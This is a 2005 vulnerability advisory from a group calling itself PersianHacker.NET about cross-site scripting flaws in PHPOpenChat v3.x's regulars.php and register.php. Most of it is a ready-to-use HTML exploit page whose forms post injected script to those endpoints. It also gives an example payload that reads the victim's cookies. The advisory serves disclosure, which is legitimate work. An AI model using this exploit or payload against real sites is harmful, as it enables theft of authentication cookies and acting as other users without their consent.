[PersianHacker.NET 200503-09]PHPOpenChat v3.X XSS Multiple Vulnerability
Date: 2005 March
Bug Number: 09

PHPOpenChat
is a high performance php-based chat server software for a live chat-room or -module on every php-based site.
More info @:
http://phpopenchat.org/


Discussion:
--------------------
The software does not properly validate user-supplied input in 'regulars.php', 'register.php'.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHPOpenChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


Exploit:
--------------------
<html>
<head>
<title>PHPOpenChat v3.x XSS Exploit</title>
</head>
<body>
<h1>PHPOpenChat v3.x XSS Exploit</h1>
<form method="POST" action="http://www.example.com/regulars.php">
  <b>XSS in regulars.php:</b><p>
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  </p>
  <p>exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<form method="POST" action="http://www.example.com/register.php">
  <b>XSS in register.php:</b><p>
  Nikname:
  <input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
  <p>
  Password:
  <input type="text" name="chatter1" size="48" value="XSS Injection Code"></p>
  <p>
  FirstName LastName:
  <input type="text" name="chatter2" size="48" value="XSS Injection Code"></p>
  <p>
  Email:
  <input type="text" name="chatter3" size="48" value="XSS Injection Code"></p>
  <p>
  Url of picture:
  <input type="text" name="chatter4" size="48" value="XSS Injection Code"></p>
  </p>
  <p>exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>


Solution:
--------------------
No solution was available at the time of this entry.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: devil_box(for xss article), amectris, herbod.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
This vulnerability reported to authors for solution, from bug report webform.